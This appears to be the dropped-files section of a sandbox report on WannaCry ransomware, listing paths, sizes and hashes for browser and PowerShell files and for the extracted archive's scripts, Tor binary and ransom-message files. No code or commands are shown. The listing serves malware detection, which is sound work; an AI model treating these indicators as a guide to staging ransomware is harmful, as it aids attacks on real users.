df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3

SHA512
af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
ab46ec9eec4d153bb8854d010d097ba5

SHA1
1dc89eba96faf74004e8113cbbe32d18b27f09f0

SHA256
7dd1a41a47914129846de4516e33ab26d0179fcbb837bfe8668ad604b5bbcacb

SHA512
9c3a0608d177bd4342a63cdba11a33e96f5f26269940c47ffd81b9522e3540c88f1d005f574ef548141592dad97197e268d75294497eacfc39ead06f47b85155

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
695a7ac6f1f96cd9a14792951448aa90

SHA1
8a10419ad2c88b72fdcbe4a29757a8ff9063515a

SHA256
524ea0a52ce4aeedca230ce2d2e761a893ffd53aca8c5256e96021c5ace4b463

SHA512
f6173233d2bfc20003aea6ac84a2b7e72d4a51e8f95f1bc52da86ad3c854936507140fbc88839f647493688391b3daab65c4488d1fddc14855266c82935cdff7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1018B

MD5
0d4d7077324f2cd749b3a9470d91912f

SHA1
02ed197f74b220e71bf01d1bc68f8b4b95e6280a

SHA256
2cb3edca6317239724dea08286f198b94a1e2df6b9f4027b057a63328593d0ff

SHA512
2099a2b4d1d848d6c75245277ffc1b4ecffd2a92327f9af15cc46b8e2e9fcdc31966d2365c9900d9039de66e2bd7587de1a7c8be2503d9ae24365a46531ec7a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
87db017e6f4ce5c263874e91c0a27a20

SHA1
93f02d0ddb8892d0b38dc1741ba357803d7cd71b

SHA256
4c928d11039bbbe680260bcc2c307fc2b4ff471c88fd5a18ffda2b794aed0547

SHA512
4fbad371f9f098727dbe97411df0e8f198d0143170bca15c9a46b9ec8394caa906febc9ff80c619b779dec6db4443631c65ec49ee00a155a7236442ac614e065

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4458cbb0b73e459e3f0270a8d7249266

SHA1
dbb3adb683df2f1fc3aa304594a92ce5c1659677

SHA256
f1af9557efdc6903c7967e2effde82694ed8fe0645c3ce9e30cbeaef73a19224

SHA512
d475f983b1e0fb9c0d75286d54552ef07da32bb192d5620b29506cfc626e5ee5776925c06c2cc44ff6ce7142a1c6507e81204fa53b06061092b4e16894ba2185

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
39e33b7b0bc8f1b999360f6bd3a65bce

SHA1
82a49586a275ad2a88ceac7ee5915bcd589b5f22

SHA256
26ea92815389450c2fb8957258305a2bec16e31aa75dc4c1279c2d9513b3db26

SHA512
c150dd66f2e5c8b5efbf8c6d05c2477fe182654fe619900dd7395be145619b34f43db3c76b9af503498250ead8e177043239accd5192e371ab074f645e9202ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
094c7bea69d6edcf7650011f8313c852

SHA1
b21fe1966a62e37ced46cd6dd7c32375c4292db1

SHA256
3367ff58086ef5379f02fc64b2515237fedb3e069ca2f2defbe33575d81c1778

SHA512
25f2f99b565ddcb2551c5a89e32aa7c43895cf03e7f2848b799e6eaf21dea10e7637b020447e5d925d7c427329e5409617f7fd625c52a150d5bfaf0179523bd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c19389b09c58fe1feefd6a0700c45236

SHA1
cb94b1eb75d167d997d4c9ae9eb8e2e0a18b7c36

SHA256
96cbe52cea2ccf114cfb92ab73b058aa52118b6bd6d4e37bb8865fc666fc361c

SHA512
948e54e88941ae748a645344725892f50b71a8de2158ea54a47b50dcbecba1608c89cba5b49e574029d57f3adac90bf15d88e2cf633a0f0f415f1e7f51862b3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f9a987f62136fcf564439b3788e7e3e7

SHA1
1d78039794514f32de7067dd214ed0337bbc8bd2

SHA256
50d9f8583dc33e3a137e09d9b4c9dc84521e9528225afa35f215269b241a32ac

SHA512
9ff113688085d3bab9418e1ad3fad3efd9ed719f4421f27f92e710f4e452fe899acc21d82f8ca22ef9eca7ca3fb79d080512bb73a98f54ee407f216a8fe6b2c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0e91096c7629034769aed5875320b8e1

SHA1
93ade31a0b712c114705b005d35261867086501e

SHA256
9b365702074213c43f2f7bb9b7866a16438cce5d9512aff00d4e062dd51079a8

SHA512
c55da711aa1fd106be1a707124f245c74556bc8ed2319ff13b7e2f2346688fb20b142f0af4d784d3e6160e7d37d5fcd6582da36ee87f885458e121e217495450

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1e3e8e50cd5f1cc85aa6d4324ed3fc91

SHA1
0166901679b734c1dd5569b0f6422b1892d788a2

SHA256
a8e8afad08eebadfe5f4f2d9a6f15ef2935eb0bafbc84c29f7ff5069ce34041d

SHA512
c185860182fb3cecbf1e54347612860d3d3423323ec4813750090760e32780fe202a8ece7017f875287ec77fb6c14522af84b1fdfa27b3c2988cdc24c0064689

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1e0998eac844abff616ce718cd095ec5

SHA1
7f230299a9ce6a922e0c83d6d36af3cdc08203cc

SHA256
a8a43b7b31a8f054108579522af5a5ef0af3f679c41a1fc1ea596f15ae265c8c

SHA512
10a471a032019792745402d3ab545de1a98173d1f4871780cc49297e543cdd453318e6fac317f097ee054d6746e4cce9a3324bab4f1c5d7a255a3f2fe6701879

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
a947fc45526f5cac706d42ca6383b216

SHA1
aa8c70c765e6b944c3f7bd11acb24f0232f1b0a1

SHA256
1bf16c7befadea00b63f47b193b955a3dab9a9c1869fdebaa5aeec7e1cbea62f

SHA512
4d2ada07ad4545170dcc16ffb58562f34daba996b992c5a8c693e14009bb112d755444800a907f52f4604dc82f7306cf49ff44a9c03cd870418a2e8c6ae8c7fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58d230.TMP

Filesize
1KB

MD5
2d321d16e182047ffc0a3a47084692aa

SHA1
71f8699071b188e20af1b81edd1c3eaae7bfd8a1

SHA256
e8ee40c7b1c5a0be55f7a8e268b3ca0edceb426e4ddef66748ed8050a597a598

SHA512
f3780a74b353d5069a229fc75cb268ef96cbb1f75bdb4f213f44d4169f4aa2bd0c6fd57d365cd05761b3fbdf47cb10ba46f0564e8ba34a535c391d01298e4713

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
cfa7114a68ff960f12847523f7763ae3

SHA1
9810229a2ae7a0c371e51b2e2a4032a686ba17db

SHA256
31fa9de165279ac4155967f4be25004e52529d5e8a60109e2047b9dc4223aad2

SHA512
c0bc71d61f680ca8be58d1a0bd15fe448d82a0a65b8fa406723d110b7951557b1dc642f34f23c35ada23a20b51d1cb9a63330ba31128c7afb7b49aa062c6db82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
46af2b0b86a6b7d09be41f1ba10f7ab8

SHA1
f16fc95275c595f4b5fa4fc14ce3079aaeadace8

SHA256
8762bb576c4bcd6a16edefb1c38f0d56b10725054a858e29c14035f44d331569

SHA512
3275d2f50d646f61fa6295d694914b407a2d946711b4c4e3be96ed49021b5481f963ae3d39c345859e0783b8c9d807f5530055a2a99a7d5f0ee52acd5a4e62c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
948df7cf1ad7ebd0ca2cbcbf115e7cbe

SHA1
cbc71c92e264d9a984a4b4c1bf2fe18421b964e5

SHA256
a4d37269396766eec82c219f6db54fb05469eb712002caf5d10a3d370b3bb18d

SHA512
ff68fd338bf0ade68c14cabeb164cbcf2d18e984e9fc3cff08a899c8bcc962f492b7b76c460af1f7fa079371c6a19cf40a74af11344780146750a2c4f99bf9b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4aeef383ac72f79bf42fc70bdb99d8b

SHA1
961183520bb24d21bec58679f8def5e3694fe9bf

SHA256
078378035118ac9b2342d3c870e1e8c9b796302343239fa2ae2470c67b07a98c

SHA512
e00d38fce46e7a323cd83ffc76807bb9b1655fb4c7839b2a742b8d3e65e6c82ea082f84f1a996b3bad8d2929e7c8b84ba99cbe2a0ade8bcc80cca6e5f598b928

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
582d4a857896aa2ace90b927af5dd689

SHA1
af0e0a8ab36f8bab69b0534283871efdc590477f

SHA256
c024146fca8dcbb1daeb90e0ba986d3345cedceef32882f06d41838e6054a6d2

SHA512
7ece4e231222e47f17014304f7767f4f336390da2db43e3abc8b1bbe028fbacb26b6289bc152b45113dbe236b8a2a8ddb0e11e79e225f69662e6ddecfc224efb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
980f88d28ff6dd4b0a6e9ce59e53bca5

SHA1
00709b5839f57d6e025486b1c1cc7a665ee6a8fb

SHA256
4c404bfdd72f4a69fef3fa5087c50bad7a665deea16211a6e3694673dd2ae416

SHA512
394970b375bd930cf14a6c4362bee2c2285e600236b8c4b76169d7752fb5a070d78e8532fd4432802fe34218590b01911aac88fc014cd74b6c231b6c2f279f7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
27f5c0d88dee2a551aab9e99b2ef09a6

SHA1
6317012dcce61c4f13aca03de9fe837b3d2666b5

SHA256
793d5e1ae865773e41fc01056e751db4d7583cd5f3482896a2bda9dd75e7fb69

SHA512
337dc4804abf16ebf18131ced306ac6e16dbfffce988dbb47a033352e9f5bd494a9dcc1144a11fcfb0d19b5839f6ab817d35b581de5ae512bce515b8facd2fb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\26511735737800.bat

Filesize
416B

MD5
632e9ecaf8cd8490c70d455089824f71

SHA1
211830fee7ba61f8fac3206ff3f2b7d4c1f450af

SHA256
661b9f4cf9320cba4e2035990cfb84cd1677137ca76f1214220621111f292c33

SHA512
c01462d7524044cca6dd48aef051adee5028f0082eddebb2bf53036237558e8bcab0c25a9e1edfbdd94f339df28a09cd8308532adddbb61954b9a192a402a05c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]

Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\c.wnry

Filesize
780B

MD5
383a85eab6ecda319bfddd82416fc6c2

SHA1
2a9324e1d02c3e41582bf5370043d8afeb02ba6f

SHA256
079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

SHA512
c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\m.vbs

Filesize
295B

MD5
1c30e927476067ffd7b7d996548a44d1

SHA1
494b16c7625e7004a3f9eada1f2dcb9951674027

SHA256
48b54e5a04e8db9eb43fe22daf597663758cda18536f51d344f107e7194b3fc4

SHA512
3015839c5d53ff2ea99170d7bfa2323675438b4c69121b4bc4df181e110850fb0da92dc42d8090583309792bfea6cf4fe05f286ae9b20a6b6ce4e14e7f30aa5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_turkish.wnry

Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\msg\m_vietnamese.wnry

Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
